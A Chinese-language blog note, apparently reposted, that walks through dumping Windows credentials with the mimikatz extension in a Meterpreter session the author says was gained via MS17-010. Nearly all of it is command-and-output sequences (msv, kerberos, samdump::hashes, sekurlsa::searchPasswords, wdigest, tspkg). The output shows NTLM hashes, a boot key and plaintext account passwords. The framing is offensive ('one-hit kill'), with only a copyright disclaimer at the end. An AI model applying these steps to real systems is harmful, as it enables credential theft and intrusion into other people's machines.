kali meterpreter中mimikatz模塊獲取密碼


kali這方面不說了, meterpreter也略過, 做個關於mimikatz的筆記.

mimikatz模塊, 能獲取對方機器的密碼(包括哈希和明文).

 滲透模塊怎么進的也不說了, 方式太多, 我用的是ms17-010

 

進去meterpreter后getuid一下(其他這個也沒多大用處,軍哥說進入meterpreter模式下 大部分情況下是擁有 system權限,無需 get system,但可能有些 權限管理嚴的 不一樣)

meterpreter > getuid 
Server username: NT AUTHORITY\SYSTEM

這獲得系統管理員權限

加載mimikatz模塊

meterpreter > load mimikatz 
Loading extension mimikatz...Success.

加載成功.

獲取登錄密碼的hash值

meterpreter > msv
[+] Running as SYSTEM
[*] Retrieving msv credentials
msv credentials
===============

AuthID    Package    Domain        User           Password
------    -------    ------        ----           --------
0;334101  NTLM       chenglee-PC   chenglee       lm{ 9cffd5e7eefa14babacbf0b4adf55fde }, ntlm{ 8d0f8e1a18236379538411a9056799f5 }
0;334068  NTLM       chenglee-PC   chenglee       lm{ 9cffd5e7eefa14babacbf0b4adf55fde }, ntlm{ 8d0f8e1a18236379538411a9056799f5 }
0;997     Negotiate  NT AUTHORITY  LOCAL SERVICE  n.s. (Credentials KO)
0;996     Negotiate  WORKGROUP     CHENGLEE-PC$   n.s. (Credentials KO)
0;49101   NTLM                                    n.s. (Credentials KO)
0;999     NTLM       WORKGROUP     CHENGLEE-PC$   n.s. (Credentials KO)

上面已經是得到hash值了. 下面算明文密碼.

獲取明文密碼

meterpreter > kerberos 
[+] Running as SYSTEM
[*] Retrieving kerberos credentials
kerberos credentials
====================

AuthID    Package    Domain        User           Password
------    -------    ------        ----           --------
0;997     Negotiate  NT AUTHORITY  LOCAL SERVICE  
0;996     Negotiate  WORKGROUP     CHENGLEE-PC$   
0;49101   NTLM                                    
0;999     NTLM       WORKGROUP     CHENGLEE-PC$   
0;334101  NTLM       chenglee-PC   chenglee       lizhenghua
0;334068  NTLM       chenglee-PC   chenglee       lizhenghua

look...拿到登錄的明文密碼了.

不過也有一些特殊的情況, 例如這樣

meterpreter > kerberos
[+] Running as SYSTEM
[*] Retrieving kerberos credentials
kerberos credentials
====================

AuthID      Package    Domain        User           Password
------      -------    ------        ----           --------
0;10408969  NTLM       CLOUDVM       Administrator
0;266228    NTLM       CLOUDVM       Administrator
0;997       Negotiate  NT AUTHORITY  LOCAL SERVICE
0;996       Negotiate  WORKGROUP     CLOUDVM$
0;23595     NTLM
0;999       NTLM       WORKGROUP     CLOUDVM$

噢, 這是什么鬼兒...哈希值也獲取不到,

沒事, 下一步繼續,

使用另一種方式獲取哈希值

meterpreter > mimikatz_command -f samdump::hashes
Ordinateur : chenglee-PC
BootKey    : 0648ced51b6060bed1a3654e0ee0fd93

Rid  : 500
User : Administrator
LM   : 
NTLM : 31d6cfe0d16ae931b73c59d7e0c089c0

Rid  : 501
User : Guest
LM   : 
NTLM : 

Rid  : 1000
User : chenglee
LM   : 
NTLM : 8d0f8e1a18236379538411a9056799f5

ok, 獲取到了, 

根據上面的方式獲取明文密碼

meterpreter > mimikatz_command -f sekurlsa::searchPasswords
[0] { chenglee ; chenglee-PC ; lizhenghua }
[1] { chenglee ; chenglee-PC ; lizhenghua }
[2] { chenglee ; chenglee-PC ; lizhenghua }
[3] { chenglee ; chenglee-PC ; lizhenghua }
[4] { chenglee-PC ; chenglee ; lizhenghua }
[5] { chenglee-PC ; chenglee ; lizhenghua }
meterpreter >

2

meterpreter > mimikatz_command -f sekurlsa::searchPasswords
[0] { Administrator ; CLOUDVM ; 1244567 }
[1] { Administrator ; CLOUDVM ; 1244567 }

都拿到了

另外提一下更簡潔的方式,就是 wdigest命令了,

這個命令呢, 沒有上面的復雜,加載模塊后直接調用這個wdigest.

meterpreter > wdigest 
[+] Running as SYSTEM
[*] Retrieving wdigest credentials
wdigest credentials
===================

AuthID    Package    Domain        User           Password
------    -------    ------        ----           --------
0;997     Negotiate  NT AUTHORITY  LOCAL SERVICE  
0;996     Negotiate  WORKGROUP     CHENGLEE-PC$   
0;49101   NTLM                                    
0;999     NTLM       WORKGROUP     CHENGLEE-PC$   
0;334101  NTLM       chenglee-PC   chenglee       lizhenghua
0;334068  NTLM       chenglee-PC   chenglee       lizhenghua

還有一個跟wdigest一樣牛的就是tspkg啦

meterpreter > tspkg 
[+] Running as SYSTEM
[*] Retrieving tspkg credentials
tspkg credentials
=================

AuthID    Package    Domain        User           Password
------    -------    ------        ----           --------
0;997     Negotiate  NT AUTHORITY  LOCAL SERVICE  
0;996     Negotiate  WORKGROUP     CHENGLEE-PC$   
0;49101   NTLM                                    
0;999     NTLM       WORKGROUP     CHENGLEE-PC$   
0;334101  NTLM       chenglee-PC   chenglee       lizhenghua
0;334068  NTLM       chenglee-PC   chenglee       lizhenghua

簡直就是一擊斃命有木有...

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM